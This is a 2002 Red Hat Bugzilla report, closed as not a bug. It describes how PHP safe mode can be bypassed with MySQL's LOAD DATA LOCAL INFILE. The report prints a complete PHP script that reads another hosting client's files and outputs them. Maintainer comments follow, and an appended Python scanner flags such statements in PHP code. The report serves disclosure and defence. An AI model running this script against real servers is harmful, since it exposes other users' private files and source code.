Bug 59916 - PHP in safe mode can read all the server contents
Status: CLOSED NOTABUG
Product: Red Hat Linux
Classification: Retired
Component: mysql
Version: 7.2
Hardware: i386 Linux
Priority: medium, Severity: medium
Assigned To: Patrick Macdonald
QA Contact: David Lawrence
Keywords: Security
Reported: 2002-02-14 15:26 EST by Renato
Modified: 2007-04-18 12:40 EDT
Doc Type: Bug Fix
Last Closed: 2002-02-27 08:53:57 EST
Description Renato 2002-02-14 15:26:06 EST
From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)

Description of problem:
By using a flaw in PHP+Mysql query, somebody can bypass safe mode. 

Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
1. Use the script:

$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db   = 'teste';

$filename = '/home/othercliente/myscript.php';     /* File to grab from [local] server */
$local = true;                      /* Read from local filesystem */

$local = $local ? 'LOCAL' : '';


$sql = array (
   "USE $db",

   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

   "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
   . "ESCAPED BY          '' "
   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

   "SELECT a FROM $tbl LIMIT 1"
);

Header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass);	

foreach ($sql as $statement) {
   $q = mysql_query ($statement);

   if ($q == false) die (
      "FAILED: " . $statement . "\n" .
      "REASON: " . mysql_error () . "\n"
   );

   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

   echo $r [0];
   mysql_free_result ($q);
}

2. Call the script using wget http://server/script

Actual Results:  You can view the source of the other client

Additional info:
Comment 1 Phil Copeland 2002-02-14 16:28:13 EST
rpm -q php
I need to know which one it is please 

cheers

Phil
=--=
Comment 2 Renato 2002-02-15 05:40:35 EST
php: 4.0.6-7
php-mysql: 4.0.6-7

It's configured as a module in Apache.
Comment 3 Peter Bowen 2002-02-27 08:53:52 EST
This is not a bug in PHP.  This is a potential bug with MySQL, but php's safe
mode cannot prevent this.  PHP can only protect internal php functions, and
mysql_* use the mysql client library.  I'm moving this to the MySQL component,
as it can only be handled there.
Comment 4 Trond Eivind Glomsrød 2002-04-08 15:31:47 EDT
This is not a bug in mysql, it does what you want and it can do. Don't set up
unsafe scripts
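
Added example (not part of the original report or its comments, and not Red Hat, PHP or MySQL code): since Comment 3 notes that safe mode cannot check a file read done by the MySQL client library, an administrator auditing hosted scripts has to find the statements themselves. This Python sketch flags LOAD DATA ... INFILE in PHP source, including the report's form where LOCAL arrives through an interpolated variable; the function names and the sample input are constructed for illustration.

```python
import re

# LOAD DATA [LOW_PRIORITY|CONCURRENT] [LOCAL] INFILE, also accepting an
# interpolated PHP variable in the modifier slot (the report's "$local").
LOAD_DATA = re.compile(
    r"LOAD\s+DATA\s+"
    r"(?P<mods>(?:(?:LOW_PRIORITY|CONCURRENT|LOCAL|\{?\$\w+\}?)\s+)*)"
    r"INFILE",
    re.IGNORECASE,
)

def classify(mods):
    """Say which process would open the file, from the words before INFILE."""
    words = mods.split()
    if any(w.upper() == "LOCAL" for w in words):
        return "client-side"   # opened by the MySQL client library inside PHP
    if any(w.lstrip("{").startswith("$") for w in words):
        return "dynamic"       # a variable may expand to LOCAL at run time
    return "server-side"       # opened by mysqld; needs the FILE privilege

def scan_php(source):
    """Return (line, kind, matched_text) for every LOAD DATA ... INFILE."""
    findings = []
    for m in LOAD_DATA.finditer(source):
        line = source.count("\n", 0, m.start()) + 1
        text = " ".join(m.group(0).split())
        findings.append((line, classify(m.group("mods")), text))
    return findings

# Constructed sample input, not taken from any real site.
SAMPLE = r'''<?php
$a = "LOAD DATA LOCAL INFILE '/tmp/in.csv' INTO TABLE t";
$b = "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl";
$c = "LOAD DATA INFILE '/var/lib/mysql-files/in.csv' INTO TABLE t";
$d = "SELECT a FROM t LIMIT 1";
'''

if __name__ == "__main__":
    for line, kind, text in scan_php(SAMPLE):
        print(f"line {line}: {kind}: {text}")
```

A "dynamic" finding needs manual review, because a pattern that only looks for the literal word LOCAL would miss the statement as written in the report.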
